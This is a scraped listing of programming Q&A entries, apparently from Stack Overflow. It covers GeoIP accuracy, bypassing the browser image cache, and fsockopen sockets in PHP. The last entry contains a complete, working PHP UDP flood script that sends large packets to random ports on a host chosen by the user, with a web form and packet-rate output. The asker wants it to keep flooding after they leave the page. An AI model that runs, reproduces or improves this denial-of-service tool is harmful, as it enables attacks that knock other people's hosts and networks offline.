forms, so asking for a country will yield 100% of Russian Federation, and GeoIP will yield 80% of Russian Federation and 20% of other, incorrect answers.

    Read the article

  • Is there a client-side way to prevent an image from being cached?

    - by morgancodes
    Is it possible to control with javascript whether a browser goes to the server for an image or to the browser cache? Can I force the browser to make a server call when it would otherwise use a cached image? I know I can simply append a query string to my image url, but, if I understand correctly, that works because the browser sees that as a new image. I want the old image to be replaced in the cache.

    Read the article

  • Do sockets opened with fsockopen stay open after you leave the page via your browser?

    - by Rob
    if(isset($_GET['host'])&&is_numeric($_GET['time'])){ $pakits = 0; ignore_user_abort(TRUE); set_time_limit(0); $exec_time = $_GET['time']; $time = time(); //print "Started: ".time('h:i:s')."<br>"; $max_time = $time+$exec_time; $host = $_GET['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; echo '<br><br> <form action="'.$surl.'" method=GET> <input type="hidden" name="act" value="phptools"> Host: <input type=text name=host value=localhost> Length (seconds): <input type=text name=time value=9999> <input type=submit value=Go></form>'; }else{ echo '<br><b>UDP Flood</b><br> <form action=? method=GET> <input type="hidden" name="act" value="phptools"> Host: <br><input type=text name=host value=localhost><br> Length (seconds): <br><input type=text name=time value=9999><br> <br> <input type=submit value=Go></form>'; } I've been looking around and asking my friends for awhile now, if I use this script to tell the server to open the sockets using fsockopen, if I leave the webpage will the sockets remain open until the duration is completed?

    Read the article

< Previous Page | 182 183 184 185 186 187 188 189 190 191 192 193  | Next Page >